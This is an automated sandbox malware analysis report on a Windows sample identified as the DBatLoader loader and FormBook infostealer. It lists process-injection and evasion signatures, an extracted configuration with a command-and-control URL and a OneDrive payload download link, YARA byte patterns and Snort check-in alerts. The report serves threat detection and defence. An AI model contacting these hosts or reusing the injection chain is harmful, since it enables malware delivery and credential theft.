Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0321423605241625.exe

Overview

General Information

Sample Name:0321423605241625.exe
Analysis ID:756155
MD5:edb1382c354ec6c09c53473e5335703a
SHA1:a1a5fbfce034731cba1072bab6b97b26c8a90c79
SHA256:c2c6eec67a1561c3a49179ddf756480876d92588c2e83d64246a04c3d724cb3d
Tags:exemodiloaderxloader
Infos:

Detection

DBatLoader, FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected DBatLoader
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • 0321423605241625.exe (PID: 3140 cmdline: C:\Users\user\Desktop\0321423605241625.exe MD5: EDB1382C354EC6C09C53473E5335703A)
    • colorcpl.exe (PID: 3576 cmdline: C:\Windows\System32\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
      • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Mwqrxeuz.exe (PID: 5528 cmdline: "C:\Users\Public\Libraries\Mwqrxeuz.exe" MD5: EDB1382C354EC6C09C53473E5335703A)
          • colorcpl.exe (PID: 4028 cmdline: C:\Windows\System32\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
        • raserver.exe (PID: 5928 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 4028 cmdline: /c del "C:\Windows\SysWOW64\colorcpl.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rematedeldia.com/euv4/"], "decoy": ["anniebapartments.com", "hagenbicycles.com", "herbalist101.com", "southerncorrosion.net", "kuechenpruefer.com", "tajniezdrzi.quest", "segurofunerarioar.com", "boardsandbeamsdecor.com", "alifdanismanlik.com", "pkem.top", "mddc.clinic", "handejqr.com", "crux-at.com", "awp.email", "hugsforbubbs.com", "cielotherepy.com", "turkcuyuz.com", "teamidc.com", "lankasirinspa.com", "68135.online", "oprimanumerodos.com", "launchclik.com", "customapronsnow.com", "thecuratedpour.com", "20dzwww.com", "encludemedia.com", "kreativevisibility.net", "mehfeels.com", "oecmgroup.com", "alert78.info", "1207rossmoyne.com", "spbutoto.com", "t1uba.com", "protection-onepa.com", "byausorsm26-plala.xyz", "bestpleasure4u.com", "allmnlenem.quest", "mobilpartes.com", "fabio.tools", "bubu3cin.com", "nathanmartinez.digital", "shristiprintingplaces.com", "silkyflawless.com", "berylgrote.top", "laidbackfurniture.store", "leatherman-neal.com", "uschargeport.com", "the-pumps.com", "deepootech.com", "drimev.com", "seo-art.agency", "jasabacklinkweb20.com", "tracynicolalamond.com", "dandtglaziers.com", "vulacils.com", "bendyourtongue.com", "gulfund.com", "ahmadfaizlajis.com", "595531.com", "metavillagehub.com", "librairie-adrienne.com", "77777.store", "gongwenbo.com", "game2plays.com"]}

Threatname: DBatLoader

{"Download Url": "https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21846&authkey=AOLP5PRESPN2npo"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Libraries\zuexrqwM.urlMethodology_Shortcut_HotKeyDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x58:$hotkey: \x0AHotKey=2
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\Public\Libraries\zuexrqwM.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x6191:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1aee0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x97ef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x148b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 57 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.colorcpl.exe.10410000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.colorcpl.exe.10410000.3.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x6191:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x1aee0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x97ef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x148b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        1.2.colorcpl.exe.10410000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.colorcpl.exe.10410000.3.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bec:$sqlite3step: 68 34 1C 7B E1
        • 0x16b08:$sqlite3text: 68 38 2A 90 C5
        • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
        1.0.colorcpl.exe.10410000.3.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          Click to see the 38 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.5217.160.0.9549719802031453 11/29/22-18:26:33.912103
          SID:2031453
          Source Port:49719
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5192.0.78.14149715802031453 11/29/22-18:26:08.582417
          SID:2031453
          Source Port:49715
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5217.160.0.9549719802031412 11/29/22-18:26:33.912103
          SID:2031412
          Source Port:49719
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.552.85.92.8449717802031453 11/29/22-18:26:23.800962
          SID:2031453
          Source Port:49717
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5217.160.0.9549719802031449 11/29/22-18:26:33.912103
          SID:2031449
          Source Port:49719
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5192.0.78.14149715802031449 11/29/22-18:26:08.582417
          SID:2031449
          Source Port:49715
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.552.85.92.8449717802031412 11/29/22-18:26:23.800962
          SID:2031412
          Source Port:49717
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.5192.0.78.14149715802031412 11/29/22-18:26:08.582417
          SID:2031412
          Source Port:49715
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.552.85.92.8449717802031449 11/29/22-18:26:23.800962
          SID:2031449
          Source Port:49717
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: 0321423605241625.exeReversingLabs: Detection: 35%
          Source: 0321423605241625.exeVirustotal: Detection: 40%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus / Scanner detection for submitted sample
          Source: 0321423605241625.exeAvira: detected
          Antivirus detection for URL or domain
          Source: www.rematedeldia.com/euv4/Avira URL Cloud: Label: malware
          Antivirus detection for dropped file
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeAvira: detection malicious, Label: HEUR/AGEN.1214697
          Multi AV Scanner detection for dropped file
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeReversingLabs: Detection: 35%
          Machine Learning detection for sample
          Source: 0321423605241625.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped file
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeJoe Sandbox ML: detected
          Source: 1.0.colorcpl.exe.10410000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.0321423605241625.exe.2170000.0.unpackAvira: Label: TR/Hijacker.Gen
          Source: 1.0.colorcpl.exe.10410000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.raserver.exe.525796c.4.unpackAvira: Label: TR/Crypt.XPACK.Gen8
          Source: 1.0.colorcpl.exe.10410000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.colorcpl.exe.10410000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.raserver.exe.a3cda0.1.unpackAvira: Label: TR/Crypt.XPACK.Gen8
          Source: 1.0.colorcpl.exe.10410000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.0321423605241625.exe.2231218.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0321423605241625.exeMalware Configuration Extractor: DBatLoader {"Download Url": "https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21846&authkey=AOLP5PRESPN2npo"}
          Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.rematedeldia.com/euv4/"], "decoy": ["anniebapartments.com", "hagenbicycles.com", "herbalist101.com", "southerncorrosion.net", "kuechenpruefer.com", "tajniezdrzi.quest", "segurofunerarioar.com", "boardsandbeamsdecor.com", "alifdanismanlik.com", "pkem.top", "mddc.clinic", "handejqr.com", "crux-at.com", "awp.email", "hugsforbubbs.com", "cielotherepy.com", "turkcuyuz.com", "teamidc.com", "lankasirinspa.com", "68135.online", "oprimanumerodos.com", "launchclik.com", "customapronsnow.com", "thecuratedpour.com", "20dzwww.com", "encludemedia.com", "kreativevisibility.net", "mehfeels.com", "oecmgroup.com", "alert78.info", "1207rossmoyne.com", "spbutoto.com", "t1uba.com", "protection-onepa.com", "byausorsm26-plala.xyz", "bestpleasure4u.com", "allmnlenem.quest", "mobilpartes.com", "fabio.tools", "bubu3cin.com", "nathanmartinez.digital", "shristiprintingplaces.com", "silkyflawless.com", "berylgrote.top", "laidbackfurniture.store", "leatherman-neal.com", "uschargeport.com", "the-pumps.com", "deepootech.com", "drimev.com", "seo-art.agency", "jasabacklinkweb20.com", "tracynicolalamond.com", "dandtglaziers.com", "vulacils.com", "bendyourtongue.com", "gulfund.com", "ahmadfaizlajis.com", "595531.com", "metavillagehub.com", "librairie-adrienne.com", "77777.store", "gongwenbo.com", "game2plays.com"]}
          Source: 0321423605241625.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
          Source: unknownHTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.5:49708 version: TLS 1.2
          Source: Binary string: colorcpl.pdbGCTL source: raserver.exe, 00000009.00000002.556117926.0000000005257000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000009.00000002.553458668.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: colorcpl.pdb source: raserver.exe, 00000009.00000002.556117926.0000000005257000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000009.00000002.553458668.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: colorcpl.exe, 00000001.00000003.306684881.000000000503F000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000003.308280419.00000000051D9000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.493545986.00000000049ED000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.553968858.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.499251021.0000000004B8C000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.554941231.0000000004E3F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: colorcpl.exe, colorcpl.exe, 00000001.00000003.306684881.000000000503F000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000003.308280419.00000000051D9000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.493545986.00000000049ED000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.553968858.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.499251021.0000000004B8C000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.554941231.0000000004E3F000.00000040.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02175B48 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02175B48

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49715 -> 192.0.78.141:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49715 -> 192.0.78.141:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49715 -> 192.0.78.141:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 52.85.92.84:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 52.85.92.84:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 52.85.92.84:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 217.160.0.95:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 217.160.0.95:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 217.160.0.95:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.rematedeldia.com/euv4/
          Source: Malware configuration extractorURLs: https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21846&authkey=AOLP5PRESPN2npo
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Joe Sandbox ViewIP Address: 13.107.43.12 13.107.43.12
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: 0321423605241625.exe, 00000000.00000003.301183621.0000000000867000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307512986.0000000000868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000002.00000000.351845290.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.310261242.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.434855289.0000000000921000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: 0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/
          Source: 0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21846&authkey=AOLP5PR
          Source: 0321423605241625.exe, 00000000.00000003.301194730.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.301178169.0000000000864000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307357943.0000000000862000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ppqfqw.ph.files.1drv.com/
          Source: 0321423605241625.exe, 00000000.00000003.301178169.0000000000864000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ppqfqw.ph.files.1drv.com/U0
          Source: 0321423605241625.exe, 00000000.00000003.301194730.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307576454.0000000000874000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ppqfqw.ph.files.1drv.com/_
          Source: 0321423605241625.exe, 00000000.00000003.301194730.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307576454.0000000000874000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ppqfqw.ph.files.1drv.com/s
          Source: 0321423605241625.exe, 00000000.00000003.301289184.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ppqfqw.ph.files.1drv.com/y4mCDNCh3rnIYpJlqIqXCF9hAcHbqZ_4sWcNl3-omCYoNehN1gOwskkZvXxiCnSz1O3
          Source: 0321423605241625.exe, 00000000.00000002.307309131.0000000000858000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.301144762.0000000000850000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ppqfqw.ph.files.1drv.com/y4mcSg4TVpIg-eA6Y1ciUp4Dzz62AcO4SwOj-306Rp8dovP_vJs6bBF8upLxcpz7eVd
          Source: unknownDNS traffic detected: queries for: onedrive.live.com
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02188CBC InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_02188CBC
          Source: global trafficHTTP traffic detected: GET /y4mCDNCh3rnIYpJlqIqXCF9hAcHbqZ_4sWcNl3-omCYoNehN1gOwskkZvXxiCnSz1O3rlGujQmh2dpM-9vT8IEOnYjevggDBPg3L6krVTX5rpZ6Y9fWqq7mXN8HP0HSdlr6-fMy35G8DvzJqxvSasnXVIJpB-5dNG-tdgdNk_U_XYoTZ1ccJrC1sgInwIFqmsOi4T1bkt9-CIDRF_pvQqcEQA/Mwqrxeuzvim?download&psid=1 HTTP/1.1User-Agent: 92Host: ppqfqw.ph.files.1drv.comConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.5:49708 version: TLS 1.2
          Source: 0321423605241625.exe, 00000000.00000002.306915554.00000000007CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
